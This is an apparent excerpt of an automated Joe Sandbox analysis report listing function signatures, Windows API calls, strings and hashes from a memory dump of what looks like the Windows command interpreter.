                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memsetwcsrchr$wcschr
                                        • String ID:
                                        • API String ID: 110935159-0
                                        • Opcode ID: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                        • Instruction ID: 4d8171d0407ed6b40246024e38603cc7819f5439e893006041674a727162b072
                                        • Opcode Fuzzy Hash: b345b7c45728a808ede4069a13096384997743dec9cf79993fccb4cd8bca3deb
                                        • Instruction Fuzzy Hash: 4751B322B0D68285FA21AF5198447F9E396BB58BF4F844235CF6E4B784EE3CE6418310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$CurrentDirectorytowupper
                                        • String ID:
                                        • API String ID: 1403193329-0
                                        • Opcode ID: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction ID: 0fcfa3307ff4dbbda2110518a452ff0ce924fee45b8b523715cccf9ba5964ff0
                                        • Opcode Fuzzy Hash: 5fd9396427832dd309ea45de15a329022afb5af3b1e2a9a89c5af6baa20d3923
                                        • Instruction Fuzzy Hash: B551C126B0D68185EB24EF22D844AB9B7A6EF49778F858035CF2D07694FF3CD6448720
                                        APIs
                                        • memset.MSVCRT ref: 00007FF7CD48921C
                                        • ??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7CD4893AA
                                          • Part of subcall function 00007FF7CD488B20: wcsrchr.MSVCRT ref: 00007FF7CD488BAB
                                          • Part of subcall function 00007FF7CD488B20: _wcsicmp.MSVCRT ref: 00007FF7CD488BD4
                                          • Part of subcall function 00007FF7CD488B20: _wcsicmp.MSVCRT ref: 00007FF7CD488BF2
                                          • Part of subcall function 00007FF7CD488B20: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD488C16
                                          • Part of subcall function 00007FF7CD488B20: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD488C2F
                                          • Part of subcall function 00007FF7CD488B20: wcschr.MSVCRT ref: 00007FF7CD488CB3
                                          • Part of subcall function 00007FF7CD49417C: GetCurrentDirectoryW.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4941AD
                                          • Part of subcall function 00007FF7CD493060: SetErrorMode.KERNELBASE(00000000,00000000,0000000A,00007FF7CD4892AC), ref: 00007FF7CD4930CA
                                          • Part of subcall function 00007FF7CD493060: SetErrorMode.KERNELBASE ref: 00007FF7CD4930DD
                                          • Part of subcall function 00007FF7CD493060: GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD4930F6
                                          • Part of subcall function 00007FF7CD493060: SetErrorMode.KERNELBASE ref: 00007FF7CD493106
                                        • wcsrchr.MSVCRT ref: 00007FF7CD4892D8
                                        • GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7CD489362
                                        • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7CD489373
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Error$Mode$AttributesFileLast_wcsicmpmemsetwcsrchr$CurrentDirectoryFullNamePathwcschr
                                        • String ID:
                                        • API String ID: 3966000956-0
                                        • Opcode ID: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                        • Instruction ID: 374c6fce4d50a13945120bce4af84be697270f4336a440b4e606d9a778aa8e27
                                        • Opcode Fuzzy Hash: 51d36840c515d6297a634993eddc42ebf602c1e6363eff28c9f7b85ed9b18e6d
                                        • Instruction Fuzzy Hash: F751A132B0DA8286EB61AF11D8506B9B3A5FB49BA4F844035DF2D47B95EF3CE651C310
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$_setjmp
                                        • String ID:
                                        • API String ID: 3883041866-0
                                        • Opcode ID: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction ID: 65374a5faea3d53b147426f37c97d3e50fa5b4fa4847c500818b607f916edf65
                                        • Opcode Fuzzy Hash: e33d06249403871d6f9610438f4bfbc3f30fdab118e84afd621e3dd41ff84285
                                        • Instruction Fuzzy Hash: 8D514F3270CB868AEB619F21D8803EAB7A4EB45798F804135DB5D87A49EF3CD744CB10
                                        APIs
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD48B4BD
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906D6
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD4906F0
                                          • Part of subcall function 00007FF7CD4906C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD49074D
                                          • Part of subcall function 00007FF7CD4906C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7CD48B4DB), ref: 00007FF7CD490762
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD48B518
                                        • _wcsicmp.MSVCRT ref: 00007FF7CD48B58B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: Heap$_wcsicmp$AllocProcess
                                        • String ID: ELSE$IF/?
                                        • API String ID: 3223794493-1134991328
                                        • Opcode ID: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                        • Instruction ID: 1c540f12ab7dc36d9d5a6dcfe4e48dd8b3e639f002752fc8a6a3819f5f34696e
                                        • Opcode Fuzzy Hash: 423616b0ad94ea500b20ba8b377132b2965d659a86947a17f8aec48fbfe776c9
                                        • Instruction Fuzzy Hash: 5F415C31F0D64386FA54BF65A8152BDA661AF547A4FC85039DF2E97296FE3CE600C320
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$File_get_osfhandle$PointerReadlongjmp
                                        • String ID:
                                        • API String ID: 1532185241-0
                                        • Opcode ID: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                        • Instruction ID: 5f80559c1177199b52d56c3a50f565386265194c559784c2e711962143dfea77
                                        • Opcode Fuzzy Hash: 771aa78906e2d4e00bf09d1751668696db7999ff0f41d10bb5d7c13c5b4464d7
                                        • Instruction Fuzzy Hash: EA41B432B087528BE754AF21D445A7DFAA1FB84BA0F854535EF2A43785EF3CEA418710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorFileLast$DeleteRead_get_osfhandle
                                        • String ID:
                                        • API String ID: 3588551418-0
                                        • Opcode ID: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                        • Instruction ID: 23e34074aa7064c0aca2384f8cb4d1bd55b98e660bdb71e76ebb344634a89764
                                        • Opcode Fuzzy Hash: 7b3e9ef8f9e00def7e0f555f85ef5a51875302e682b222ee2a1690b22849d021
                                        • Instruction Fuzzy Hash: DE418131B0C6428BE7247F51984427DF661EB85BA0F944039DF2E87795EF3CEA408760
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: ErrorModememset$FullNamePath_wcsicmp
                                        • String ID:
                                        • API String ID: 2123716050-0
                                        • Opcode ID: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction ID: 9a7bec5cd8569f6ded2cb1598561de662fa46c3a069cd096dc2a2ca4466bc0e2
                                        • Opcode Fuzzy Hash: 33d1f1addd1234cebd96803971f963ad7e2cc1408ae37093ec207d02c7820e71
                                        • Instruction Fuzzy Hash: C141A032709AC28AEB71AF21D8843E9B795EB4979CF844134DF5D4AA98EF3CD3448710
                                        APIs
                                        Similarity
                                        • API ID: Console$Window_get_osfhandle$InitializeModeUninitializememset
                                        • String ID:
                                        • API String ID: 3114114779-0
                                        • Opcode ID: dd13b5c20e564fbc5da2777ccedce70a1d97cd9fadfc38a69240d2783957a71e
                                        • Instruction ID: 3363a0dd427c3773d072216aa55e75efe0e94476548c4508bd80cf5aa6b0851c
                                        • Instruction Fuzzy Hash: 5F416932B09B429AEB00EF65D8402ACBBA5FB88758F944035DF1D93B54EF38D606C760
                                        APIs
                                        • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA77A
                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA7AF
                                        • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA80E
                                        • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA839
                                        • RegCloseKey.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,?,?,00000000,00000000,00000000,00007FF7CD4A9A82), ref: 00007FF7CD4AA850
                                        Similarity
                                        • API ID: QueryValue$CloseErrorLastOpen
                                        • String ID:
                                        • API String ID: 2240656346-0
                                        • Opcode ID: 259df60cb868630656fe61ae38790f52a7232b22d9cc8ec1dbee3975f468035b
                                        • Instruction ID: 066c63d01d2fe2c2cee5086d5ae0e2ec87bf3d95d612d7ca3591a2dfa9e2fbd3
                                        • Instruction Fuzzy Hash: 5F318F32B1CA4196EB50AF25E48447AF7E5FB887A0F944035EF9E46764EF3CD9418B20
                                        APIs
                                          • Part of subcall function 00007FF7CD4901B8: _get_osfhandle.MSVCRT ref: 00007FF7CD4901C4
                                          • Part of subcall function 00007FF7CD4901B8: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,00007FF7CD49E904,?,?,?,?,00000000,00007FF7CD493491,?,?,00000000,00007FF7CD4A4420), ref: 00007FF7CD4901D6
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4AD0F9
                                        • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7CD4AD10F
                                        • ScrollConsoleScreenBufferW.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7CD4AD166
                                        • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0 ref: 00007FF7CD4AD17A
                                        • SetConsoleCursorPosition.API-MS-WIN-CORE-CONSOLE-L2-1-0 ref: 00007FF7CD4AD18C
                                        Similarity
                                        • API ID: Console$BufferHandleScreen$CursorFileInfoPositionScrollType_get_osfhandle
                                        • String ID:
                                        • API String ID: 3008996577-0
                                        • Opcode ID: cebe966d7df5a2bd0607568b5e1b41817dd61a68bafb8258f014fa92f4b8adc0
                                        • Instruction ID: f024c570a67bb7c7bf8d89f5615791a42c71b833a468e7a7f24f4867b5dc07bf
                                        • Instruction Fuzzy Hash: 6F215E32B18A419AE700AFB1E8040BDB7B1FB5DB58B845125DF5D53B58EF38D240CB24
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: CreateSemaphore
                                        • String ID: _p0$wil
                                        • API String ID: 1078844751-1814513734
                                        • Opcode ID: f755fc07889d6bdabc5bc906762bcb13605c747dc28133a8421b38486d33263f
                                        • Instruction ID: b4cc0db3d65e874c7fde4f1517ca389686f11ad99792507b1541c31b82d76bef
                                        • Instruction Fuzzy Hash: 2251F562B1D78286EE21AF5485546B9F2A4AF84BB0FD44435DF5D0B780FF3CE6058320
                                        APIs
                                        • RtlCreateUnicodeStringFromAsciiz.NTDLL ref: 00007FF7CD4AB934
                                        • GlobalAlloc.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7CD495085), ref: 00007FF7CD4AB9A5
                                        • GlobalFree.API-MS-WIN-CORE-HEAP-L2-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF7CD495085), ref: 00007FF7CD4AB9F7
                                        Strings
                                        Similarity
                                        • API ID: Global$AllocAsciizCreateFreeFromStringUnicode
                                        • String ID: %WINDOWS_COPYRIGHT%
                                        • API String ID: 1103618819-1745581171
                                        • Opcode ID: 16d2b5de7a39f60598d54afa282db4830b4e4e1db5eb0a36e09c541776fa7494
                                        • Instruction ID: 53a2763204a78cf879f2225a584c8c71398dab5f648e5b1cb7408df31c93b5a0
                                        • Instruction Fuzzy Hash: 8B417D62B0CA8286EA10AF15D410279B7A5FB59BA0FC59235DFAD07395FF3CE681C710
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: memset$_wcslwr
                                        • String ID: [%s]
                                        • API String ID: 886762496-302437576
                                        • Opcode ID: eb4fc62ff4127de29e093c52d368a60165998186bbeaa5c9376a54b17af478ff
                                        • Instruction ID: a14f90a53ce3d1a484712293e92773b37d46f86107885d5e9bc8ca32a046bc8c
                                        • Instruction Fuzzy Hash: 01318D32709B8295EB21EF62D8503E9A7A0FB49B98F844035DF9D47754EF3CD2458710
                                        APIs
                                          • Part of subcall function 00007FF7CD4933A8: iswspace.MSVCRT(?,?,00000000,00007FF7CD4AD6EE,?,?,?,00007FF7CD4A0632), ref: 00007FF7CD4933C0
                                        • iswspace.MSVCRT(?,?,?,00007FF7CD4932A4), ref: 00007FF7CD49331C
                                        Strings
                                        Similarity
                                        • API ID: iswspace
                                        • String ID: off
                                        • API String ID: 2389812497-733764931
                                        • Opcode ID: 23619b9e270ea0a6abcdd2ffa6124d8d0217e46963fde130039e410627268166
                                        • Instruction ID: d305a1a1a0268bea4ddc89bdcc00ed2e0d549eb27ecbcc99dc7c8d3852e8bdfd
                                        • Instruction Fuzzy Hash: 9A219421B0C64291FA70AF579458679F697EF46BA0FCC8034DF6E47690FE2CE6408321
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: wcschr$Heapiswspace$AllocProcess
                                        • String ID: %s=%s$DPATH$PATH
                                        • API String ID: 3731854180-3148396303
                                        • Opcode ID: fb3125d80182464f50c82bc0c4d5350ea8168baa4617960a2893f38ef28f8be7
                                        • Instruction ID: 0c634b2a07d0842a9beb0e12c8ec306ea5b35549c1795a4e1465f4671017d59c
                                        • Instruction Fuzzy Hash: 05218025B0DA5290EE54AF95E440679E3A5AF84BA4FC88135CF2E47395FF3CD6408760
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: wcscmp
                                        • String ID: *.*$????????.???
                                        • API String ID: 3392835482-3870530610
                                        • Opcode ID: 2267b9e2c7923373c3284e1f11a26023b10064941758683347217dc228a16a6c
                                        • Instruction ID: b510f3ddd91d3c0773f6e3389b0ec29f46dde850ee54a0ebf3f1d114e21aa9b8
                                        • Instruction Fuzzy Hash: E811E525B1CE6281E764AF2BB441939F3A6FB44B90F985030CF9D47B85EE3DE5818710
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: fprintf
                                        • String ID: CMD Internal Error %s$%s$Null environment
                                        • API String ID: 383729395-2781220306
                                        • Opcode ID: 0cb055b157f36561183311c9dd91b0f05aa56f2c0aaf14e14510f586112b26cc
                                        • Instruction ID: 50b576ab4bedeef853e7e74eb5984fe59c0752c72afde726add6f133b2b8de00
                                        • Instruction Fuzzy Hash: 5A118F31B0CA4291FA55AF15E9040B9A2A1EB587B0FC45332DF7D432D4FF2CEA418360
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: iswspacewcschr
                                        • String ID: .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC$=,;
                                        • API String ID: 287713880-1183017076
                                        • Opcode ID: 8fcb7a04138a3b23992a7cdb16ce22985c951060ce84957cc9b0662892501dea
                                        • Instruction ID: b7efc4017dc269c29ddbef636ca25c6b8138cdea264dc1b13fef2da7e4e9e431
                                        • Instruction Fuzzy Hash: 84F0A421B1CA5293EA609F43A400579F7A6FF65F62BC99130DF6D02244FF3DE540C660
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: KERNEL32.DLL$SetThreadUILanguage
                                        • API String ID: 1646373207-2530943252
                                        • Opcode ID: 33fd74526e8d725267334377f69302da3f837b9787d184b3d8809460f86dc4c4
                                        • Instruction ID: f47c4be1510fd17cbc65e7a4d46f09641c72deaa594ab017a83cb7fdce343b56
                                        • Instruction Fuzzy Hash: 9501E921B0DE02A2EA48EF52A851538A7A5EF59771BC44775CE3E023E0FE7D66918320
                                        APIs
                                        Strings
                                        Similarity
                                        • API ID: AddressHandleModuleProc
                                        • String ID: RaiseFailFastException$kernelbase.dll
                                        • API String ID: 1646373207-919018592
                                        • Opcode ID: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                        • Instruction ID: 9d8b55284a52fdf013d98c34c9c698aa41f811aa91f094626bc2733b57c20f71
                                        • Opcode Fuzzy Hash: 3febe13a05f537dc5e67cec473ac92f04f036d5fc975d7a9241dfcd9d5059c04
                                        • Instruction Fuzzy Hash: 54F01721B1CA91A2EA40AF52F448069FA61EB99BE0B889175DE5E03B14EF3CD685C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$CurrentDirectorytowupper
                                        • String ID:
                                        • API String ID: 1403193329-0
                                        • Opcode ID: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                        • Instruction ID: b35f092bc07e7b3c51f9b3d0cd851833149c0d96748d11f37854b9c1e16bfc55
                                        • Opcode Fuzzy Hash: 9eadb3359a7035c4c8b06301bcad4ec111c2959e7ad062144f1a1f931ae642b1
                                        • Instruction Fuzzy Hash: 7761C132B08B828AE710EF61D8446ADB7A5FB847A8F904136DF6D53699EF38D640C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: _wcsnicmp$wcschr
                                        • String ID:
                                        • API String ID: 3270668897-0
                                        • Opcode ID: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                        • Instruction ID: ef2fc67d21614687dd396adc0caa2ec982cdd35625fd4b8f4cd21004fcdba8cd
                                        • Opcode Fuzzy Hash: 0c5351208ff2a5a36442746df2c9d56de1180022aab67ae3c28b2a55d3b35da5
                                        • Instruction Fuzzy Hash: B3517111F0D64291EA60BF22D410979E7A6EF55BA0FD88135CF6E072D5FE2CEA418360
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: memset$DriveFullNamePathType
                                        • String ID:
                                        • API String ID: 3442494845-0
                                        • Opcode ID: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                        • Instruction ID: 371853f8f752edc6a99883ffc1772414e8a2385cd742e415afdebade4603341a
                                        • Opcode Fuzzy Hash: 96e94011f7e51b9192f665da575d41fb78cf0bd335fa213fa644a3e80f09fdea
                                        • Instruction Fuzzy Hash: 0C317932709B828AEB60AF61E8447E9B3A5FB88B94F844025EF5D47B54EF38D605C710
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                        • String ID:
                                        • API String ID: 140117192-0
                                        • Opcode ID: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                        • Instruction ID: 2a10a0badf7f627fdb0fd9e433cab293928ceba469adc2c3da502a6ae110a58e
                                        • Opcode Fuzzy Hash: f9503a7e6f26e693eab0e8ec34dcabcd79a91a5ad0fdcc229cb5dec8ce22a0f7
                                        • Instruction Fuzzy Hash: 8941E435B0CF4191EA48AF49F880365B368FB98764F9050B6DEAE42764EF3DE644C720
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: wcstol$lstrcmp
                                        • String ID:
                                        • API String ID: 3515581199-0
                                        • Opcode ID: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                        • Instruction ID: 5648928adc74e93c44f448e3c1522697f1fd4e04fddf8c685bec59002a3a633a
                                        • Opcode Fuzzy Hash: 5b9efed5608bd49f2816daba6a3b85e90b3500fb38e55be3423670eddfbfd6ec
                                        • Instruction Fuzzy Hash: 1F21D232B0C64283E6616F7EA09493AEBA9FF4D770F815134CF5F02655EE6CE6448620
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C5000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4CF000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234772291.00007FF7CD4D9000.00000002.00000001.01000000.00000004.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_4_2_7ff7cd480000_alpha.jbxd
                                        Similarity
                                        • API ID: File_get_osfhandle$TimeWrite
                                        • String ID:
                                        • API String ID: 4019809305-0
                                        • Opcode ID: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                        • Instruction ID: 8c2987a33f4ad16d0e41c7f1ed0827a9925a8b7786bfeff71e0fcfc44231a1aa
                                        • Opcode Fuzzy Hash: 81587e0329514d19275e074575feb35963da2dd15ba7483d0e323a7e2a39d08e
                                        • Instruction Fuzzy Hash: D9318F22B0CA4287E7A06F159484239E6A5BB59B70F846238DF2D42BD5EF3CDA449610
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.1234637232.00007FF7CD481000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7CD480000, based on PE: true
                                        • Associated: 00000004.00000002.1234620873.00007FF7CD480000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234665370.00007FF7CD4B2000.00000002.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4BD000.00000004.00000001.01000000.00000004.sdmp
                                        • Associated: 00000004.00000002.1234682435.00007FF7CD4C1000.00000004.00000001.01000000.00000004.sdmp
